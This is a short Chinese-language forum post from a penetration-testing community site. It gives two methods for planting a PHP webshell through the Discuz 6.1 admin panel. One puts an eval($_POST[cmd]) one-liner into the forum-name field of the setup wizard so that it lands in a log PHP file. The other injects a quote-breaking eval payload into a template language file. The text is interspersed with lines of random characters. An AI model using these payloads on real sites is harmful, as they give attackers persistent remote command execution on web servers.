中国网络渗透测试联盟
标题:
discuz6.1后台拿shell方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:59
标题:
discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
# _9 u( v# J5 | F) p
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
: Z" ~7 i* o! n8 d! ^
1:
3 p% n I/ L$ S) K0 _6 F2 E
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
' j" D7 t3 g0 }! {% [' V
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
! }, c$ ~3 ^' b& }1 r; \5 p
<?php eval($_POST[cmd]);?>
6 @3 I& r3 }' B7 J/ |) K
后台webshell地址:
http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
; o9 P' h3 e# m3 O
% B& c: j, k! m3 k+ O) {- m; _
, n4 j) [3 `5 k: E
2:后台模板管理--默认模板套系--详情
. n3 d( g" A1 J- D# r1 I- q- ]
templates/default/actions.lang.php
1 e9 [ Z' i" S0 U6 ~# `% n
jhackj\\');eval($_POST[cmd])?>;//
! o6 {) @0 d' W
4 @( m8 M" ^' j9 w, R& V$ S9 Q
利用很简单,聪明的人一看就懂了
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2